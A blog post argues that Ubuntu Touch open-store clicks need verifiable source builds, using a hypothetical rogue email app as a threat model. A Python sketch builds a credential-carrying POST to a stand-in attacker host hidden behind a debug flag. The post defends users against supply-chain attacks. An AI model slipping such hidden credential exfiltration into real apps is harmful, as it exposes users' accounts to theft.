AlaskaLinuxUser's Scratchpad

Commit thy works unto the LORD, and thy thoughts shall be established. - Proverbs 16:3

Ubuntu Touch: Are Clicks Secure?

I've been spending a lot of time working on Ubuntu Touch clicks lately. For those who don't know, a click is the UT name for an app. If you've been reading my blog, then you'll notice that I'm on a mission to update about 200 apps from the old UT version, Xenial, to the current UT version, Focal. With each update, I make pull requests to help the original dev, or if they are not interested, I fork the project and release the updated version of the click on the open-store.

All of this is well and good, and I've been having a good time doing it. But as I wandered along, updating clicks/apps, I noticed something peculiar. For each app that is out of date on the open-store, I follow the link to the source code and try to update it and build the click. In a great many cases, what I am finding is that the linked source code does not lead to the actual source code used to build the app.

In most cases, it is a bit of an oversight: they link to source code that was on Github but has since moved to Gitlab, or the link points to the upstream code of a program that wasn't written for Ubuntu Touch, but which they used to build the UT click. Unfortunately, these apps are hard to update, since I would have to rebuild the entire Clickable portion around the app again, as the original developer must have done years ago. Usually it is some sort of technical oversight, and not malicious in nature.

However, this led me to ask a question on the Ubuntu Touch Question and Answer group:

How do I know that the app/click I downloaded from the Ubuntu Touch open-store is actually the same one built from the source code?

The answers on the Q&A were well intentioned, suggesting that this is solved for "core apps" because they use Gitlab CI to build the source code in the app's repository, which then automatically uploads the click, ensuring that whatever was in the Gitlab repo at build time is exactly what was built and uploaded to the open-store.
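To make that concrete, here is a hypothetical sketch of what such a CI job could look like. The image name and paths are illustrative, not taken from any particular core app; the point is that the click is built from the repo contents and uploaded by the pipeline, not from someone's laptop:

```yaml
# .gitlab-ci.yml (illustrative sketch): build the click from whatever is
# in the repository, so the published artifact matches the source at
# this exact commit.
build-click:
  image: clickable/ci-20.04-arm64   # hypothetical CI image name
  script:
    - clickable build --arch arm64  # Clickable is the standard UT build tool
  artifacts:
    paths:
      - build/*/app/*.click         # keep the built click as a CI artifact
```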

Well, that sounds pretty good, but it got me thinking. I had just uploaded about 20 clicks to the open-store manually, without Gitlab CI, straight from my laptop, with a link to the source code, but there actually isn't any proof that what I uploaded is an exact build of that source code.

So I asked my question again on the Ubuntu Touch App Developer Telegram channel. They were very helpful and pointed me to the UT Open-Store Telegram channel, where I asked my question once more. I also asked how I could know that something bad hadn't been put into a click, since clicks can be uploaded manually. An admin of the channel immediately answered that I need not worry: all clicks are confined, the open-store scans them, and the apparmor policy prevents them from accessing anything they shouldn't.

By the way, for those who don't know, confined is like saying 'sandboxed', meaning that the program can't reach out of its confined container and steal something else from your phone.
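For the curious, a click declares its confinement in a small JSON apparmor file shipped with the app. This is only an illustrative fragment (the exact policy_version depends on the framework the click targets), but it shows the shape of the thing: the app requests named policy groups, and access to everything else is denied:

```json
{
    "policy_groups": [
        "networking"
    ],
    "policy_version": 16.04
}
```

Keep that `networking` group in mind; it matters for the scenario below.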

They also explained that if an app/click is going to be unconfined, then the app gets a manual review before release and is built from source by one of the developers on the UT open-store team. Sounds great! I decided that wasn't quite the answer I was looking for, but fair enough, and I drove on.

However, a few hours later, I was working on the click for uFTP. uFTP, by the way, has no nefarious code, no issues, no problems, but while updating the click for Focal, I realized that an apparmor policy, an open-store scan, and being confined aren't actually enough. You see, even confined, with a great apparmor policy, an app with some malicious code could pass the open-store scan without being caught, and still steal the user's data.

Take the uFTP app: it allows you to view FTP and SFTP data on a server, either with a login and password or with RSA keys. Now, uFTP actually allows read and write in the user's home directory, so for our purposes it is not confined, meaning it is not a good example, but it led me to realize how a bad actor could steal all of a user's data:

Imagine a dev, whom we will call 'blackhat' because they are nefarious, who decides to steal UT user data. They build a few clicks, one of which is an email app. It is completely confined, has a great apparmor policy, and links to all the open source code used to build it. Sounds great.

But 'blackhat' makes the listing on the open-store with links to the good source code, while actually building from another repo containing the same source plus a few extra lines of code. In the 'blackhat' version, when you set up an email account and input your username and password, the bad click/app sends that information, behind a debugging flag, to one of 'blackhat's' servers. 'Blackhat' uploads this click to the open-store; it passes the scan, its apparmor looks good, and the app is confined, so it gets published on the open-store.

Hundreds of users download this great new email app and immediately set up their username and password. Networking is part of the click's apparmor policy, so sending the email credentials looks normal, and nothing stops 'blackhat' from owning username and password information for hundreds of users. 'Blackhat' then spends his free time logging into everyone's email, looking at banking information, sending requests to reset bank account passwords... sending your boss an email that you quit... whatever floats his boat, and the poor end user is up a creek without a paddle.
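To see why neither the scan nor the apparmor policy helps here, consider a minimal sketch (all names hypothetical, standard library only) of what the rogue build adds. Both requests below are ordinary HTTPS POSTs; from the confinement system's point of view they are indistinguishable, because the networking policy group does not constrain *which* hosts an app may talk to:

```python
import json
import urllib.request


def build_login_request(url: str, username: str, password: str) -> urllib.request.Request:
    """Build an HTTPS POST carrying the user's credentials.

    Whether `url` is the user's real mail provider or an attacker's
    server, confinement sees the same thing: an app in the `networking`
    policy group opening an outbound connection.
    """
    body = json.dumps({"user": username, "pass": password}).encode()
    return urllib.request.Request(
        url, data=body, headers={"Content-Type": "application/json"}
    )


# The legitimate request the user expects the email app to make...
good = build_login_request("https://mail.example.com/login", "alice", "hunter2")

# ...and the extra request 'blackhat' hides behind a debugging flag.
DEBUG_EXFIL = True  # hypothetical flag in the rogue build
if DEBUG_EXFIL:
    bad = build_login_request("https://blackhat.example.net/collect", "alice", "hunter2")

# Both requests are identical in shape; only the hostname differs, and
# the apparmor policy does not constrain hostnames.
```

Nothing in this sketch would trip a static scan either: it is the same networking code the legitimate app already contains, pointed at one extra host.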

So I went back to the UT Open-Store Telegram channel and presented this type of scenario to them. I also wanted to suggest a solution, not perfect, but better than nothing: disable manual click uploads and use Gitlab CI uploads instead. Unfortunately, this sparked a somewhat heated debate: some were opposed to my solution, some wanted reproducible builds, some thought there was no possible threat, and others couldn't understand the issue.

In the end, since there was so much heated debate about what to do, I asked the group to reconsider my scenario and say whether they thought it was possible at all, so we could determine whether this was actually a threat, and if it was, discuss what to do about it.

Unfortunately, this was the group administrator's reply - taken verbatim, as a whole, bad punctuation and all:

any data you share with any app or web site, or even other person, is "at risk" and not something that can be solved through stricter requirements for uploading packages to open-store

Link to admin's reply

At present, it seems that the group admin does not wish to pursue this issue any further. I'm not sure how to take that, to be honest. So, do we not lock our houses, because locks can be broken?

When my home was burglarized in Guam, the police said that it was not breaking and entering, because one of the windows was open. I know that the window was originally locked shut with a padlock (the windows had storm shutter/bars over them) and that the padlock must have been cut off, but the police concluded that no criminal would take the padlock with them. If they broke in, they would just cut the padlock and leave it on the ground. Perhaps then it doesn't really matter?

No, I think that we owe it to open-store users to make a reasonable effort to prove that the app/click they download is actually the one built from the real source code for the app. We could use an authoritative build structure, like an open-store server that builds the apps from source code, or at a minimum, Gitlab CI (other git hosts have similar), so that if someone cheats the system, there will at least be a public record on the git host, or they will have to go to great pains to cover it up. I don't think we can simply put the burden of trusting the clicks and apps in the official UT open-store on the user.
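As a sketch of the minimum such a build structure would buy us: if the store (or its CI pipeline) published the SHA-256 digest of the source-built click, anyone could check that the copy they downloaded matches it. The byte strings below stand in for real .click files; the names are hypothetical, but the check itself is the point:

```python
import hashlib


def sha256_hex(data: bytes) -> str:
    """Hex SHA-256 digest of a blob (a real check would stream the file)."""
    return hashlib.sha256(data).hexdigest()


# Stand-in for the click the CI pipeline built from the linked source:
source_built = b"click built by Gitlab CI from the public repo"
# Digest the pipeline would publish alongside the artifact:
ci_digest = sha256_hex(source_built)

# Stand-in for the click actually served by the open-store:
store_copy = b"click built by Gitlab CI from the public repo"

# The verification step: any divergence from the source build shows up here.
if sha256_hex(store_copy) == ci_digest:
    print("store click matches the source build")
else:
    print("store click does NOT match the source build")
```

A manually uploaded click has no published digest to compare against, which is exactly the gap described above.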

I guess now I just have to see if anyone else in the UT community agrees.

Linux - keep it simple.